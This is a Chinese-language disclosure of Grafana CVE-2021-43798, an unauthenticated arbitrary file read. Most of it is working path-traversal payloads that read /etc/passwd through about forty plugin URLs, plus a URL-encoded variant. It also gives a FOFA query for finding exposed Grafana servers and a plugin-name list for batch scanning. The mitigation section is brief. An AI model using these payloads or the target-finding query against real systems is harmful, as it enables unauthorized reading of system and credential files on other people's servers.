Grafana漏洞披露：CVE-2021-43798 未授权任意文件读取

漏洞描述：

Grafana存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。

危害等级：

「高危」

FOFA 查询：

app=”Grafana”

影响范围：

Grafana 8.0.0 – 8.3.0

漏洞测试：

攻击者可通过以下Payload读取主机上的敏感文件：

/public/plugins/alertlist/../../../../../../../../../../../etc/passwd<br>/public/plugins/annolist/../../../../../../../../../../../etc/passwd<br>/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd<br>/public/plugins/barchart/../../../../../../../../../../../etc/passwd<br>/public/plugins/bargauge/../../../../../../../../../../../etc/passwd<br>/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd<br>/public/plugins/dashlist/../../../../../../../../../../../etc/passwd<br>/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd<br>/public/plugins/gauge/../../../../../../../../../../../etc/passwd<br>/public/plugins/geomap/../../../../../../../../../../../etc/passwd<br>/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd<br>/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd<br>/public/plugins/graph/../../../../../../../../../../../etc/passwd<br>/public/plugins/graphite/../../../../../../../../../../../etc/passwd<br>/public/plugins/heatmap/../../../../../../../../../../../etc/passwd<br>/public/plugins/histogram/../../../../../../../../../../../etc/passwd<br>/public/plugins/influxdb/../../../../../../../../../../../etc/passwd<br>/public/plugins/jaeger/../../../../../../../../../../../etc/passwd<br>/public/plugins/logs/../../../../../../../../../../../etc/passwd<br>/public/plugins/loki/../../../../../../../../../../../etc/passwd<br>/public/plugins/mssql/../../../../../../../../../../../etc/passwd<br>/public/plugins/mysql/../../../../../../../../../../../etc/passwd<br>/public/plugins/news/../../../../../../../../../../../etc/passwd<br>/public/plugins/nodeGraph/../../../../../../../../../../../etc/passwd<br>/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd<br>/public/plugins/piechart/../../../../../../../../../../../etc/passwd<br>/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd<br>/public/plugins/postgres/../../../../../../../../../../../etc/passwd<br>/public/plugins/prometheus/../../../../../../../../../../../etc/passwd<br>/public/plugins/stat/../../../../../../../../../../../etc/passwd<br>/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd<br>/public/plugins/status-history/../../../../../../../../../../../etc/passwd<br>/public/plugins/table/../../../../../../../../../../../etc/passwd<br>/public/plugins/table-old/../../../../../../../../../../../etc/passwd<br>/public/plugins/tempo/../../../../../../../../../../../etc/passwd<br>/public/plugins/testdata/../../../../../../../../../../../etc/passwd<br>/public/plugins/text/../../../../../../../../../../../etc/passwd<br>/public/plugins/timeseries/../../../../../../../../../../../etc/passwd<br>/public/plugins/welcome/../../../../../../../../../../../etc/passwd<br>/public/plugins/zipkin/../../../../../../../../../../../etc/passwd

/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

批量POC：

「payload.txt」

<code>alertGroups<br>alertlist<br>alertmanager<br>annolist<br>barchart<br>bargauge<br>canvas<br>cloudwatch<br>dashboard<br>dashlist<br>debug<br>elasticsearch<br>gauge<br>geomap<br>gettingstarted<br>grafana-azure-monitor-datasource<br>grafana<br>graph<br>graphite<br>heatmap<br>histogram<br>influxdb<br>jaeger<br>live<br>logs<br>loki<br>mixed<br>mssql<br>mysql<br>news<br>nodeGraph<br>opentsdb<br>piechart<br>pluginlist<br>postgres<br>prometheus<br>stat<br>state-timeline<br>status-history<br>table-old<br>table<br>tempo<br>testdata<br>text<br>timeseries<br>welcome<br>xychart<br>zipkin<br>cloud-monitoring<br>cloudwatch<br>alertmanager<br>dashboard</code>

修复建议：

目前暂无详细的解决方案，请关注厂商主页更新：https://grafana.com/

临时修复建议：

1. 通过防火墙等安全设备设置访问策略，设置白名单访问。
2. 如非必要，禁止公网访问该系统。